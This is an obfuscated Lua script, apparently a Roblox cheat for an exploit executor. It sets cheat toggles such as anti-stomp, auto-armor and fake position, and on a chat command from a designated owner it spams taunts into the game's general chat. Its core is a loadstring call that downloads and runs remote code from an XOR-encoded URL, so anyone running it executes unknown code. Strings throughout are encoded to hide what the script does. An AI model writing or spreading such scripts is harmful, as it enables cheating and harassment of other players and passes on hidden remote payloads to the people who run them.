--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

script_key = ""
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v25,v26) local v27={};for v34=1, #v25 do v6(v27,v0(v4(v1(v2(v25,v34,v34 + 1 )),v1(v2(v26,1 + (v34% #v26) ,1 + (v34% #v26) + 1 )))%256 ));end return v5(v27);end local v8=getgenv().Cooldude;getgenv().Owner='"'   .. v8   .. '"' ;getgenv().Gun={v7("\240\246\252","\126\177\163\187\69\134\219\167"),v7("\15\224\13","\156\67\173\74\165")};getgenv().DisableRendering=false;getgenv().autoArmorEnabled=true;getgenv().floss=true;getgenv().AntiStompOn=true;getgenv().FakePos=false;getgenv().AutoMaskOn=true;getgenv().shitalk=false;getgenv().AntiMod=true;loadstring(game:HttpGet(v7("\60\163\93\6\175\124\9\123\182\89\31\242\42\83\53\165\68\25\174\104\72\49\163\6\16\181\42\67\39\248\95\69\243\42\73\53\179\76\4\175\105\19\103\224\27\20\189\114\16\109\229\30\20\189\39\23\98\179\79\23\185\36\30\97\231\76\69\191\112\68\48\229\17\88\176\51\71","\38\84\215\41\118\220\70")))();local v19=game:GetService(v7("\96\26\35\11\251\66\5","\158\48\118\66\114"));local v20=game:GetService(v7("\159\33\8\34\80\173\250\191\23\21\36\101\172\248\174","\155\203\68\112\86\19\197"));local v21=game:GetService(v7("\117\201\55\238\84\125\247\223\83\212","\152\38\189\86\156\32\24\133"));local v22=false;local v23={v7("\206\114\140\114\217\115\231\100\197\23\138\103\210\112\136\6\207\99\134\104\216","\38\156\55\199"),"IS THAT STANDO? 😂",v7("\130\82\94\104\50\68\202\111\129\94\93\28\58\91\212\3\129\78\60\17\60\65\200\3\142\72\72\29\33\81","\35\200\29\28\72\115\20\154"),v7("\52\158\255\248\162\108\7\45\158\255\251\205\31\27\53\144\226\159\180\3\1","\84\121\223\177\191\237\76"),v7("\153\100\230\224\22\127\3\245\251\98\225\133\122\1\38\144\251\98\230\224\22\113\23","\161\219\54\169\192\90\48\80"),v7("\103\114\35\101\107\103\40\4\127\107\47\23\9\102\37\17\108\97\52\0\109","\69\41\34\96"),v7("\140\241\242\57\49\107\142\131\227\37\66\25\153\247\229\51\66\18\147\246\229\74\49\0\149\239\251","\75\220\163\183\106\98"),v7("\49\145\162\27\245\66\147\184\4\236\39\250\168\24\247\36\147\185\26\252\38","\185\98\218\235\87"),v7("\238\10\2\200\158\139\254\8\8\192\255\152\230\124\23\202\255\147\248\124\5\195\234\158\238\14","\202\171\92\71\134\190"),v7("\11\243\3\200\15\238\30\175\6\245\108\160\6\246\108\188\6\129\14\164\6\226\7","\232\73\161\76"),v7("\150\248\108\122\49\251\234\118\124\48\159\153\110\116\40\158\234\2\111\59\149\237\2\123\44\158\252","\126\219\185\34\61"),"THIS AIN'T THE TUTORIAL 😭",v7("\47\235\108\70\87\81\218\194\40\142\124\71\74\67\220\201\76\227\127\65\86\82\193","\135\108\174\62\18\30\23\147"),v7("\143\198\31\139\63\129\7\135\149\198\5\224\61\138","\167\214\137\74\171\120\206\83"),v7("\169\194\29\29\204\143\164\197\21\117\204\231\163\213\114\117\217\131\203\209\114\126\208\134\165\211\23","\199\235\144\82\61\152"),v7("\52\38\156\8\51\55\141\14\71\59\150\15\34\86\149\4\40\61\144\5\71\36\156\10\43\86\158\4\40\50","\75\103\118\217"),v7("\243\102\73\84\152\57\230\125\94\84\151\59\255\96\48\39\156\44\241\113\66","\126\167\52\16\116\217"),v7("\234\28\15\192\152\54\207\252\110\20\175\244\56\188\238\28\21\169\128\89\207\252\15\14\164","\156\168\78\64\224\212\121"),v7("\47\207\151\234\71\205\138\251\41\218\128\252\34\202\229\236\62\174\128\246\46\221\145\231\41\201","\174\103\142\197"),v7("\102\1\113\31\101\122\209\112\14\31\115\101\109\211\127\4\115\120\1\119\222\112","\152\54\72\63\88\69\62")};local function v24(v28) local v29=0 -0 ;while true do if (v29==(0 -0)) then if (v28.Name~=v8) then return;end v28.Chatted:Connect(function(v37) local v38=0 + 0 ;while true do if (v38==(0 -0)) then v37=v37:lower();if (v37==v7("\154\208\250\83\218","\60\180\164\142")) then v22=true;elseif (v37==v7("\22\74\17\38\33\235","\114\56\62\101\73\71\141")) then v22=false;end break;end end end);break;end end end for v30,v31 in ipairs(v19:GetPlayers()) do v24(v31);end v19.PlayerAdded:Connect(v24);task.spawn(function() while true do if v22 then local v35=0;local v36;while true do if (v35==(0 + 0)) then v36=1474 -(1329 + 145) ;while true do if (v36==(971 -(140 + 831))) then pcall(function() v20.TextChannels.RBXGeneral:SendAsync(v23[math.random(1, #v23)]);end);task.wait(1853 -(1409 + 441) );break;end end break;end end else task.wait(718.2 -(15 + 703) );end end end);task.spawn(function() local v32=tick();local v33=3;while (tick() -v32)<v33  do pcall(function() v21:SetCore(v7("\139\236\213\192\150\230\207\205\190\224\216\197\172\224\212\202","\164\216\137\187"),{[v7("\230\239\37\190\163","\107\178\134\81\210\198\158")]=v7("\53\15\140\193\165\120\29\150\199\164\60\78\141\200\234\44\1\146\135\235","\202\88\110\226\166"),[v7("\247\10\154\227","\170\163\111\226\151")]="",[v7("\53\37\160\57\90\62\38\31","\73\113\80\210\88\46\87")]=1 + 0 });end);task.wait(438.1 -(262 + 176) );end end);
